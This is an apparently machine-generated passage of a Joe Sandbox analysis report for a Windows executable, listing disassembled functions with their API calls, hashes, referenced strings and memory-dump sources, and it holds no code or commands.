                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                            • String ID: U
                                                                                                                                            • API String ID: 2456169464-4171548499
                                                                                                                                            • Opcode ID: 712222997dc5b1538dc2d0b88df764630c28d5bcd9003af8c0187e0eb55dfb4b
                                                                                                                                            • Instruction ID: 088372486afbc619ff42cf203e9728a46fdd165e987c09af5d180043348231c9
                                                                                                                                            • Opcode Fuzzy Hash: 712222997dc5b1538dc2d0b88df764630c28d5bcd9003af8c0187e0eb55dfb4b
                                                                                                                                            • Instruction Fuzzy Hash: 3541D023A19A4183EB208F25E8043BA77A4FB88794F444131EE8DC7794DF3ED601DB45
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1429681911-3916222277
                                                                                                                                            • Opcode ID: c7f6fad14c3d6c45f1c2b7caa2a52cae9f8f1ced179c147e4ce1c58448344ac3
                                                                                                                                            • Instruction ID: 8f24aaf5f2401ce2d4369fe560141859bb9e362b410b94916a60143c906d2e10
                                                                                                                                            • Opcode Fuzzy Hash: c7f6fad14c3d6c45f1c2b7caa2a52cae9f8f1ced179c147e4ce1c58448344ac3
                                                                                                                                            • Instruction Fuzzy Hash: 88313A7A60C74287EB149F12BC18B2AB7A0F789FD1F504036ED4A83B14CE3ED4598B48
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                            • API String ID: 445417207-3402441367
                                                                                                                                            • Opcode ID: 99f6d65a07cf8bf95a3317284abe824290d081a01910556595ade93b96f3ebe9
                                                                                                                                            • Instruction ID: b25dd2406b40672f360d067fca8bdcdc3e2b8f851976b8d93010e55164d1a6db
                                                                                                                                            • Opcode Fuzzy Hash: 99f6d65a07cf8bf95a3317284abe824290d081a01910556595ade93b96f3ebe9
                                                                                                                                            • Instruction Fuzzy Hash: FC31C2A7A0878183FA509B52E5503B82775FB49BC0F144036DE4E877A6CF7FE411970A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                                                            • Opcode ID: 13f9ad013cac519ce349f5504603e8b53550548678ccca31ab2fdf361bbf366e
                                                                                                                                            • Instruction ID: 2abf236ffe37d9f7b4881460724ddbaa4f526e6ebd45f0350e1bf6dc415449d8
                                                                                                                                            • Opcode Fuzzy Hash: 13f9ad013cac519ce349f5504603e8b53550548678ccca31ab2fdf361bbf366e
                                                                                                                                            • Instruction Fuzzy Hash: 8121D833A1564187FB508F25E8443B93396EF88B0CF188034DA4D8A285CF7F9956D799
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: string too long$vector too long
                                                                                                                                            • API String ID: 909987262-1617939282
                                                                                                                                            • Opcode ID: bf641c3c5974ce66e2a0b2880ccf11569d008c973ede66d2c38dcb554d452594
                                                                                                                                            • Instruction ID: a8cd77edc9b441d3dcfad0e4b68cb010f7d5a2254b2f985807ffe46e71dcaac9
                                                                                                                                            • Opcode Fuzzy Hash: bf641c3c5974ce66e2a0b2880ccf11569d008c973ede66d2c38dcb554d452594
                                                                                                                                            • Instruction Fuzzy Hash: 8D01D027A1968983DA18EF55E4401AC2314EB04B84F740831D71D87F5DCF3AF552D746
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDeviceRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 127614599-3916222277
                                                                                                                                            • Opcode ID: e35430a80067ed5c599f0c4cf63278b51e6c528b2c3c6057d4612a7681bc9ea9
                                                                                                                                            • Instruction ID: e31ee2a6f5e0df94e74afe65e398ab90960b9ae48ec09b2e36fbfa4a1f215efa
                                                                                                                                            • Opcode Fuzzy Hash: e35430a80067ed5c599f0c4cf63278b51e6c528b2c3c6057d4612a7681bc9ea9
                                                                                                                                            • Instruction Fuzzy Hash: D2E0C2A6B0C68183FF1857B6BD8963A23A1AB4CBD0F155036DA0B83795CE3FC4A48304
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDA51
                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDAA3
                                                                                                                                            • SetFileTime.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDB1F
                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDB2A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2287278272-0
                                                                                                                                            • Opcode ID: 004a402ec90159654e0f9c24e0e069453512d6831d079bea76122ea97e4b0f91
                                                                                                                                            • Instruction ID: bb101ee0d9cf3b0833b4aeebd676f07c69639af0619ff0c9d7a627d3f70a7435
                                                                                                                                            • Opcode Fuzzy Hash: 004a402ec90159654e0f9c24e0e069453512d6831d079bea76122ea97e4b0f91
                                                                                                                                            • Instruction Fuzzy Hash: 42410723B1C68243EA509F15E4107BA63A8BB857A4F104730FE9D8B7D9DF3EE5069709
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4141327611-0
                                                                                                                                            • Opcode ID: 2b668bd76d14f2f8ab0dd80881aece6f30b53a7b9c8b08ad1738bf6dbfe99615
                                                                                                                                            • Instruction ID: 9cef0f6b9eb38f137266cad6c31c107baf7026ffdf96520149603bcbdb87fa89
                                                                                                                                            • Opcode Fuzzy Hash: 2b668bd76d14f2f8ab0dd80881aece6f30b53a7b9c8b08ad1738bf6dbfe99615
                                                                                                                                            • Instruction Fuzzy Hash: 8341D433A0874247FB659B5098403B963F8AF80B90F244131EA9D87AD5CF2EDA41BB47
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E5041
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E50A3
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E50DD
                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E5107
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1557788787-0
                                                                                                                                            • Opcode ID: f754b3c0f73671a64fdde6fc3cc89888f9baca1484c97dc4fe5d3377623ca749
                                                                                                                                            • Instruction ID: 20af76384fae0c762d18abbae62599bbeecec7ad28622457e9bbee0df5b3b657
                                                                                                                                            • Opcode Fuzzy Hash: f754b3c0f73671a64fdde6fc3cc89888f9baca1484c97dc4fe5d3377623ca749
                                                                                                                                            • Instruction Fuzzy Hash: 8B219523F1879183E6209F15A80012977A8FB54BD4B184135EE9FE3B94DF3DE9519349
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2767541406-0
                                                                                                                                            • Opcode ID: 4a30333c879c68a34f529f39b5829c35a6cd3e21a8827b66c9cb77036400c987
                                                                                                                                            • Instruction ID: 3dd720ae28929e069b0d075c65dda281d767f5d2313f18397eaaa4ccc4ceb396
                                                                                                                                            • Opcode Fuzzy Hash: 4a30333c879c68a34f529f39b5829c35a6cd3e21a8827b66c9cb77036400c987
                                                                                                                                            • Instruction Fuzzy Hash: 6D117573A1CB4183E7508F61F84066A77B5FB84B90F444136EA8E83618DF3ED545DB45
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$abort
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1447195878-0
                                                                                                                                            • Opcode ID: 3f4ef64f2f454977924a36fa54a86b731289c5ecc8e177a09109bd2aed786486
                                                                                                                                            • Instruction ID: c6ba82f406f3652072ca5bf233d81330c7939a0f867b069aaa5c6ee891891581
                                                                                                                                            • Opcode Fuzzy Hash: 3f4ef64f2f454977924a36fa54a86b731289c5ecc8e177a09109bd2aed786486
                                                                                                                                            • Instruction Fuzzy Hash: C8018013B0824243FA58AB359E5637C13695F44794F140438D85E867D7ED2FBA45B21B
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00007FF6EF6C5BC8: ResetEvent.KERNEL32 ref: 00007FF6EF6C5BE1
                                                                                                                                              • Part of subcall function 00007FF6EF6C5BC8: ReleaseSemaphore.KERNEL32 ref: 00007FF6EF6C5BF7
                                                                                                                                            • ReleaseSemaphore.KERNEL32 ref: 00007FF6EF6C5860
                                                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF6EF6C587F
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF6EF6C5896
                                                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF6EF6C58A3
                                                                                                                                              • Part of subcall function 00007FF6EF6C5948: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C594F
                                                                                                                                              • Part of subcall function 00007FF6EF6C5948: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C595A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 502429940-0
                                                                                                                                            • Opcode ID: 7880f0b9577ac6633197cb0e93d477d959873e5e5245d2c1684bbdee791a0292
                                                                                                                                            • Instruction ID: dd7db0b46945eb91bb90bce606fc22ef8017bea7c1226387ce4cda257c34b605
                                                                                                                                            • Opcode Fuzzy Hash: 7880f0b9577ac6633197cb0e93d477d959873e5e5245d2c1684bbdee791a0292
                                                                                                                                            • Instruction Fuzzy Hash: CE014033A15A91A3E6489B21ED547AD6334FB84B94F004031DBAE47611CF3AF5B4D745
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                            • Opcode ID: cd249567d5fc9b2bd0d19825638c6a62b7ba7040ad7c9854edbab099c08aa467
                                                                                                                                            • Instruction ID: efca056d75426244b2e19c3f84fd92b21af50c05be414a9169159ff1999d7ad3
                                                                                                                                            • Opcode Fuzzy Hash: cd249567d5fc9b2bd0d19825638c6a62b7ba7040ad7c9854edbab099c08aa467
                                                                                                                                            • Instruction Fuzzy Hash: 65E0EDAAE0D74243FF186B717C19B3517A0AF49741F44543AC81E87391EE3FA0658709
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                            • API String ID: 3215553584-3030954782
                                                                                                                                            • Opcode ID: d9a94c966112591baecd8cfaba2ee9b013493ec1dad2214d9841388033714fe1
                                                                                                                                            • Instruction ID: adc8859c15a71af344e0c0e7c370570947cbff8293314407a4800aee194a25cb
                                                                                                                                            • Opcode Fuzzy Hash: d9a94c966112591baecd8cfaba2ee9b013493ec1dad2214d9841388033714fe1
                                                                                                                                            • Instruction Fuzzy Hash: 8B512663F187C247EB258F359D413696B96EB81B90F088335C698CBAD6CE2ED144E706
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6EF6BD452,?,?,?,?,?,?,?,00007FF6EF6BC5D2), ref: 00007FF6EF6BF722
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
